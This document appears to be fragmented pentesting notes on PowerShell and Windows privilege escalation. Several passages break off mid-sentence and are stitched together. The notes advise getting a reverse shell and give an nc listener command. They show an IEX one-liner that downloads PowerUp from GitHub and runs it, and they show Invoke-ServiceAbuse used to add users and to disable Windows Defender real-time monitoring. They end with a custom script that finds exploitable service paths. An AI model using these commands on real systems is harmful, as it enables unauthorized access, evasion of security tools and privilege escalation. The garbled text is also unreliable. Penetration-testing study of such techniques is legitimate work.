Core
• Installed by default since Windows 7
• Cmdlets use verb-noun names to reduce command memorization: PowerShell uses a "verb-noun" naming system.
• Example:
  • cd -> Set-Location
  • cat, type -> Get-Content
• Aliases are also registered (check with: > alias, i.e. Get-Alias)
• Scripts are *.ps1 files
here. Because there are many.
• Is there a vulnerability in a service the system is running?
• If you are in an environment where your code can run, it is best to get a reverse shell.
• Exploit-DB will help you (https://www.exploit-db.com/)
• If you run a reverse TCP payload through some vulnerability, the target connects back over TCP to your server.
• PayloadsAllTheThings or the MSFVenom Cheatsheet (the latter uses a Meterpreter payload) (https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
• Your server (listener): $ nc -lvnp 4444 # listen on port 4444
user has higher privileges such as administrator.
• Example: Dirty COW, CVE-2016-5195 (https://www.exploit-db.com/exploits/40847, etc.)
• Sorry for using a Linux environment; it was the most affordable. The same applies to Windows.
Internet, you can download it from GitHub:
PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks
• The most common way I end up using PowerUp is by using the Invoke-AllChecks function, which runs through all relevant checks for the machine and outputs a status report:
-exec bypass
2. PS C:\> Import-Module PowerUp.ps1
3. PS C:\> Invoke-AllChecks
4. If an abuse function is found:
   1. Add a new user with a password using the -User and -Password options
      PS C:\> Invoke-ServiceAbuse -Name '<AbuseService>' -User <User> -Password <Password>
   2. Run a custom command (here: disable Windows Defender real-time monitoring)
      PS C:\> Invoke-ServiceAbuse -Name '<AbuseService>' -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      Caveat: Invoke-ServiceAbuse only works on a service whose configuration the current user may change (the finding Invoke-AllChecks reports), and on hosts with Defender Tamper Protection enabled the Set-MpPreference change is rejected.
5. PS C:\> Restart-Computer -Force
   Only needed when the abused service could not be stopped and started directly; it must be set to start automatically for the reboot to run it.
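To confirm what Invoke-AllChecks reports before abusing a service, here is an added example, written for this page and not PowerUp's own code, that re-implements two of its service checks: unquoted service paths containing spaces, and service binaries or their folders that the current user can write to. It does not check the service's own DACL (the configuration right Invoke-ServiceAbuse needs); the function name Get-ServicePathIssue is an assumption for this example.

```powershell
# Added example (not PowerUp code): manual version of two Invoke-AllChecks service checks.
function Get-ServicePathIssue {
    [CmdletBinding()]
    param()

    # Identities the current token carries: the user plus every group it is a member of.
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $names = @(@($id.Name) + @($id.Groups | ForEach-Object {
        try { $_.Translate([System.Security.Principal.NTAccount]).Value } catch { $null }
    }) | Where-Object { $_ })

    # True if the ACL grants one of our identities a right that lets us replace file data.
    function Test-Writable([string] $Target) {
        if (-not $Target -or -not (Test-Path -LiteralPath $Target)) { return $false }
        try { $acl = Get-Acl -LiteralPath $Target } catch { return $false }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($names -notcontains $ace.IdentityReference.Value) { continue }
            # WriteAttributes alone is useless; look for rights that change content.
            if ("$($ace.FileSystemRights)" -match 'FullControl|Modify|WriteData|\bWrite\b') { return $true }
        }
        return $false
    }

    Get-CimInstance Win32_Service | ForEach-Object {
        $path = $_.PathName
        if (-not $path) { return }

        # Isolate the executable: quoted path, else everything up to the first ".exe".
        $exe = ($path -split ' ')[0]
        if ($path -match '^"([^"]+)"')       { $exe = $Matches[1] }
        elseif ($path -match '^(.*?\.exe)')  { $exe = $Matches[1] }

        # Classic bug: C:\Program Files\Vendor\svc.exe unquoted lets C:\Program.exe run first.
        $unquoted = ($path -notmatch '^"') -and ($exe -match ' ')
        $binWrite = Test-Writable $exe
        $dirWrite = Test-Writable (Split-Path -Path $exe -Parent)

        if ($unquoted -or $binWrite -or $dirWrite) {
            [pscustomobject]@{
                Name              = $_.Name
                RunsAs            = $_.StartName      # LocalSystem is the interesting case
                StartMode         = $_.StartMode
                PathName          = $path
                UnquotedPath      = $unquoted
                WritableBinary    = $binWrite
                WritableDirectory = $dirWrite
            }
        }
    }
}

# Usage:  Get-ServicePathIssue | Format-Table -AutoSize
```

Nothing here needs administrator rights, which is the point: the output tells you whether the hit is usable by the account you already have (RunsAs and StartMode matter as much as the writable flag), and rights the ACL expresses only as raw numeric masks are not matched, so a negative result is not proof of safety.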